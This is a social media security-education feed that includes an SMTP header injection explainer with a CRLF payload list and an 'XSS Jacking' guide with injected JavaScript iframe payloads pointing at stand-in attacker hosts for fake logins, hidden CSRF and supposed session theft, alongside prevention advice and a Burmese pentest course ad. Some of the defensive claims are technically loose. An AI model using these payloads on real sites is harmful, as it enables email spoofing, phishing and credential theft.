DarkWeb Myanmar Knowledge

16/07/2025

📩 How Hackers Exploit SMTP Injection to Send Spoofed Email

🔍 What is SMTP Injection?

SMTP Injection is a web security vulnerability that allows an attacker to inject SMTP commands or email headers into an application that sends emails using unsanitized user input. This can lead to email spoofing, mass spam mailing, and sometimes even command injection, depending on the mail server configuration.

---

🎯 Common Areas Where SMTP Injection Happens

SMTP Injection vulnerabilities usually occur in the following areas:

📩 Contact Us forms

📝 Feedback or support ticket forms

🧾 Newsletter subscription forms

🔑 Forgot password or email verification features

✅ Signup confirmation emails

Root Cause: These areas accept user input that is directly used in the email headers (To, From, Subject, etc.) without proper sanitization.

---

🧪 Real-World Example (PHP)

Here’s a vulnerable PHP snippet:



If an attacker enters the following as email input:

[email protected]%0ACc:[email protected]

The resulting email headers become:

From: [email protected]
Cc: [email protected]

🔓 Now the attacker can inject additional recipients and send spoofed or malicious emails using your server!

---

💣 SMTP Injection Payloads

Below are common payloads used to test or exploit SMTP Injection:

[email protected]%0ACc: [email protected]
[email protected]%0ABcc: [email protected]
[email protected]\r\nSubject: Injected Email
%0A%0DTo: [email protected]%0ASubject: Hacked

These payloads inject new lines (%0A = LF, %0D = CR) to trick the email header structure.

---

🧰 Tools for Testing

Burp Suite – Modify HTTP request with payloads

OWASP ZAP – Active scanning and fuzzing

WFuzz – Fuzz headers with SMTP payloads

Python Scripts – Using smtplib or requests for custom testing

Mailtrap.io – For safe testing without sending real emails

---

🔧 Prevention Techniques

To prevent SMTP Injection, follow these best practices:

✅ 1. Sanitize and Validate Inputs

Strip or block newline characters: \n, \r, %0A, %0D

Whitelist valid email formats using:

$email = filter_var($_POST['email'], FILTER_VALIDATE_EMAIL);

✅ 2. Use Secure Mailing Libraries

Use libraries or services that handle email headers automatically:

PHPMailer

SendGrid

Mailgun

SMTP2GO

✅ 3. Don't Include Raw User Input in Headers

Avoid inserting raw user input directly in headers like From, Cc, Bcc, or Subject.

---

✅ Pe*******on Testing Checklist

✅ Test Case Description

Header Injection Inject newline characters and see if additional headers are accepted
Spoofed Headers Try injecting fake From, Cc, or Bcc
Payload Fuzzing Fuzz form inputs with common payloads
Mass Mail Potential Check if multiple recipients can be injected
Response Analysis Analyze server response or email logs

---

🧠 Impact of SMTP Injection

✅ Email Spoofing

✅ Phishing Campaigns via Trusted Domain

✅ Mass Spamming

✅ Domain Blacklisting

✅ Loss of Reputation & Deliverability

---

📌 Real Incident:

> A bug bounty hunter found SMTP Injection in a popular retail site’s feedback form. He was able to send spoofed emails to thousands of users using their trusted domain. The company’s domain got blacklisted, and customer trust was lost — all due to a single unsanitized input field.

---

🚫 Don’t Let This Happen To You!

SMTP Injection is easy to miss, but its impact can be devastating. Always validate user inputs, use secure libraries, and never trust user-controlled data when building emails.

03/07/2025

Mobile Application Security Online Training

အခုခေတ်လူအသုံးများဆုံးဖြစ်တဲ့ Mobile Application တွေရဲ့ Security အကြောင်းတွေကို အခြေခံကစပြီးသေချာလေ့လာချင်တဲ့သူတွေအတွက် သင်ကြားပေးမည့်အတန်းဖြစ်ပါတယ်။ Mobile Application ကိုဘယ်လို Pentest လုပ်ပြီး ဘယ်လိုကာကွယ်ရမလဲဆိုတာကိုသေချာနားလည်အောင်သင်ကြားပေးမည့်အတန်းလည်းဖြစ်ပါသည်။

Android နှင့် iOS နှစ်ပိုင်းစလုံးအတွက် Pentest လုပ်တဲ့အခါ သိထားသင့်ရမည့်အကြောင်းအရာများအား Practical သင်ကြားပေးပါမည်။ Mobile Application Security နဲ့ပတ်သက်ပြီး အခြေခံကောင်းကောင်းရချင်တဲ့သူတွေအတွက် ဒါမှမဟုတ် ဒီနယ်ပယ်ကို စိတ်ဝင်စားလို့ စပြီးလေ့လာချင်တဲ့သူတွေအတွက် သင့်တော်သောအတန်းဖြစ်ပါသည်။

သင်တန်းအတွက်လိုအပ်ချက်များအနေနဲ့ Computer အခြေခံရှိပြီး i5 CPU, Ram 8GB အနိမ့်ဆုံးရှိရမည်။
သင်တန်းကာလ ၂ လ နီးပါးကြာမည်ဖြစ်ပြီး အချိန်ကတော့ အပတ်စဉ် (Sat,Sun) မနက် 10:00 နာရီ မှ 11:30 နာရီအထိဖြစ်ပါသည်။ Online Zoom live class လည်းဖြစ်ပါသည်။ ဒါကြောင့် Ineternet Connection ကောင်းကောင်းရှိဖိုလိုအပ်ပါသည်။

အခြေခံလိုအပ်ချက်အနေဖြင့် Creatigon ရဲ့ Web Application သင်တန်းတက်ထားဖူးသူဖြစ်ရပါမည်။

သင်တန်းကြေး 500,000 MMK
သင်တန်းစမည့်ရက် 9 August 2025

သင်ကြားမည့်အကြောင်းအရာများကတော့ အောက်ပါအတိုင်းဖြစ်ပါတယ်။

0x01: App Architecture & Security Fundamentals
0x02: Data Storage & Transmission Security
0x03: Reverse Engineering & Code Analysis
0x04: Mobile Application Vulnerabilities
0x05: Mobile Pe*******on Testing Methodology
0x06: SSL Pinning & Root Detection Bypass Techniques
0x07: Secure Development Practices
0x08: Tools & Automation
0x09: CTFs, Case Studies & Final Project
0x0A: Exam

ကြိုတင်စာရင်းပေးနိုင်ပါပြီ။
စာဖတ်ပေးတဲ့အတွက်ကျေးဇူးတင်ပါတယ်။

28/06/2025

Hi everyone! 🌟 You can support me by sending Stars - they help me earn money to keep making content you love.

Whenever you see the Stars icon, you can send me Stars!

28/06/2025

28/06/2025

Pentesting

28/06/2025

OSINT CHEAT SHEET
https://github.com/Jieyab89/OSINT-Cheat-sheet?tab=readme-ov-file -cheat-sheet---list-osint-tools-

28/06/2025

Fuzzing subdomains and validating them with dnsx and httpx!

Try this:
dnsx -d FUZZ. -w | httpx -sc

💡 Add -mc 200,301,302 to filter only accessible hosts.

28/06/2025

ဟက်ကတျောက်က သင်တို့ရဲ့ password ကိုဘယ်လိုယူလည်းဆိုတာသေချာကြည့်ပါ၊..

28/06/2025

XSS Jacking with iFrames: A Comprehensive Guide

📜 Introduction to XSS Jacking

XSS Jacking is a specialized web application attack that uses Cross-Site Scripting (XSS) vulnerabilities in combination with iFrames to hijack user actions. This technique allows attackers to overlay a malicious iFrame on a vulnerable website, tricking users into interacting with the malicious frame while they believe they're interacting with the original page.

---

🔍 How Does XSS Jacking Work?

1. Setup: The attacker exploits an XSS vulnerability to inject an iFrame on a legitimate website.

2. Ex*****on: The iFrame mimics legitimate functionality or overlays sensitive elements like login forms or buttons.

3. Goal: When the user interacts with the iFrame, their actions (e.g., credentials submission or file uploads) are redirected to the attacker-controlled system.

---

🛠️ Example XSS Jacking Attack

Scenario:
A vulnerable web application allows an attacker to inject JavaScript.

Injected Payload:


const iframe = document.createElement('iframe');
iframe.src = "https://malicious-site.com/fake-login";
iframe.style.position = "absolute";
iframe.style.top = "0";
iframe.style.left = "0";
iframe.style.width = "100%";
iframe.style.height = "100%";
iframe.style.border = "none";
iframe.style.zIndex = "9999";
document.body.appendChild(iframe);


Explanation:

The iFrame covers the entire screen, displaying the attacker-controlled content.

The user interacts with the malicious iFrame, unknowingly providing sensitive information.

---

🎯 Advanced XSS Jacking Example

Scenario: Hijacking button clicks on a legitimate site.
The attacker injects the following payload:


const iframe = document.createElement('iframe');
iframe.src = "https://malicious-site.com";
iframe.style.position = "absolute";
iframe.style.top = "10px";
iframe.style.left = "10px";
iframe.style.width = "200px";
iframe.style.height = "50px";
iframe.style.border = "none";
iframe.style.zIndex = "9999";
iframe.style.opacity = "0"; // Makes it invisible!
document.body.appendChild(iframe);


Attack Flow:

1. The malicious iFrame overlays a legitimate button (e.g., “Submit” or “Login”).

2. The user clicks on what they think is the legitimate button, but their click interacts with the invisible iFrame instead.

---

🧩 Payloads for XSS Jacking

1. Stealing Login Credentials:


const iframe = document.createElement('iframe');
iframe.src = "https://malicious-site.com/fake-login";
iframe.style.width = "100%";
iframe.style.height = "100%";
iframe.style.border = "none";
document.body.appendChild(iframe);


2. CSRF Exploitation via iFrame:


const iframe = document.createElement('iframe');
iframe.src = "https://victim-site.com/api/perform-action";
iframe.style.width = "0";
iframe.style.height = "0";
document.body.appendChild(iframe);


3. Session Hijacking:


const iframe = document.createElement('iframe');
iframe.src = "https://attacker-site.com/steal-session";
iframe.style.display = "none";
document.body.appendChild(iframe);


---

🔒 Defending Against XSS Jacking

1. CSP (Content Security Policy):

Prevent loading external iFrames or scripts by using:

Content-Security-Policy: frame-ancestors 'self';

2. Input Sanitization and Validation:

Use libraries like DOMPurify to sanitize user input.

3. Enable X-Frame-Options:

Add the X-Frame-Options: DENY or SAMEORIGIN header to prevent the website from being framed.

4. Disable iFrame Embedding:

If iFrames are not required, avoid using them entirely.

5. Anti-Clickjacking Measures:

Include JavaScript to detect and block unauthorized framing:

if (window.top !== window.self) {
window.top.location = window.self.location;
}

25/06/2025

https://drive.google.com/file/d/12krlHMkin3CuFt_m7ZldWE-y-SxnMSnE/view